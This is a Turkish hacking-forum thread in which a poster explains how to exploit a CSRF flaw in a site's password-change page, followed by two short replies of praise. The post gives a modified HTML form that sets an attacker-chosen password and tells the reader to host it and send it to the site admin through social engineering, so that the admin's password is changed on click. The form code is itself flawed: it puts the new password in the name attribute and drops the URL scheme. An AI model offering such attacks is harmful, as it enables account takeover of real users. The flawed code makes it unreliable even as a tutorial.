CSRF/XSRF AÇIĞI BULMA

kyripton.root

kyripton.root

Yeni üye
1 Haz 2023
4
8
CSRF/XSRF Açığı Nasıl Bulunur ?

– Bir web site düşünün web sitenin üyelik sistemi var bura bir forum sitesi olabilir ve şifre değiştirme bölümü şöyle http://www.hedef.com/sifredegistir.php olsun siz üyeliğinizden şifreyi değiştirdiğiniz anda eğer şöyle olursa ;




burada CSRF/XSRF açığı vardır. Bizim yapmamız gereken şey sayfanın kaynak kodunu görüntelemek olacak, bu http://www.hedef.com/sifredegistir.php?sifre=CWHack sayfanın kaynak kodunu görünteleyelim.
<form></form> taglarını arayalım.

<form method=”GET” action=”sifredegistir.php”>
<input type=”text” name=”sifreniz”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>
Genişletmek için tıkla ...

-Şimdi birkaç değişiklik yapacağız buradaki action=”sifredegistir.php” sifredegistir.php kısmına sitenin tam şifre değiştirme adresini yazıyoruz. Yani; http://www.hedef.com/sifredegistir.php yazıyoruz.
name=”sifreniz” buradaki sifreniz kısmına ise istediğiniz bir şifreyi yazıyoruz. Mesela abcd yazalım. Yani şöyle olacak ;

<form method=”GET” action=”www.hedef.com/sifredegistir.php”>
<input type=”text” name=”abcd”>
<input type=”Submit” Name=”Submit” Value=”Gönder”>
</form>
Genişletmek için tıkla ...

– Şimdi kodları html olarak kaydedelim. Sonra hostunuza atın. Kurbana yani admine Sosyal Mühendislik yoluyla atalım. Eğer linke tıklarsa şifresi abcd olarak değişecek. CSRF/XSRF açığı bu kadar.
 
Moderatör tarafında düzenlendi:
Privarp

Privarp

Anka Team Junior
8 Nis 2022
135
44
kyripton.root' Alıntı:
CSRF/XSRF Açığı Nasıl Bulunur ?

– Bir web site düşünün web sitenin üyelik sistemi var bura bir forum sitesi olabilir ve şifre değiştirme bölümü şöyle http://www.hedef.com/sifredegistir.php olsun siz üyeliğinizden şifreyi değiştirdiğiniz anda eğer şöyle olursa ;




burada CSRF/XSRF açığı vardır. Bizim yapmamız gereken şey sayfanın kaynak kodunu görüntelemek olacak, bu http://www.hedef.com/sifredegistir.php?sifre=CWHack sayfanın kaynak kodunu görünteleyelim.
<form></form> taglarını arayalım.



-Şimdi birkaç değişiklik yapacağız buradaki action=”sifredegistir.php” sifredegistir.php kısmına sitenin tam şifre değiştirme adresini yazıyoruz. Yani; http://www.hedef.com/sifredegistir.php yazıyoruz.
name=”sifreniz” buradaki sifreniz kısmına ise istediğiniz bir şifreyi yazıyoruz. Mesela abcd yazalım. Yani şöyle olacak ;



– Şimdi kodları html olarak kaydedelim. Sonra hostunuza atın. Kurbana yani admine Sosyal Mühendislik yoluyla atalım. Eğer linke tıklarsa şifresi abcd olarak değişecek. CSRF/XSRF açığı bu kadar.
Genişletmek için tıkla ...
Eline sağlık
 
'BackSix

'BackSix

*
19 May 2013
997
75
Bir fikir olarak /tavsiye; Güzel bir konu düşünüp, güzelde açıklamalar mevcut. Forumda ki konulara göz geçirip içerik düzenlemeler nasıl oluyor gibi göz gezdirip açarsan daha güzel görüntüler elde edebilirsin (Telefondan tabi bunları yaptıysan, o işin zor kısmı bunu es geçebiliriz. :) ). Eline - emeğine sağlık.
 
Cevap yazmak için giriş yap yada kayıt ol.
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.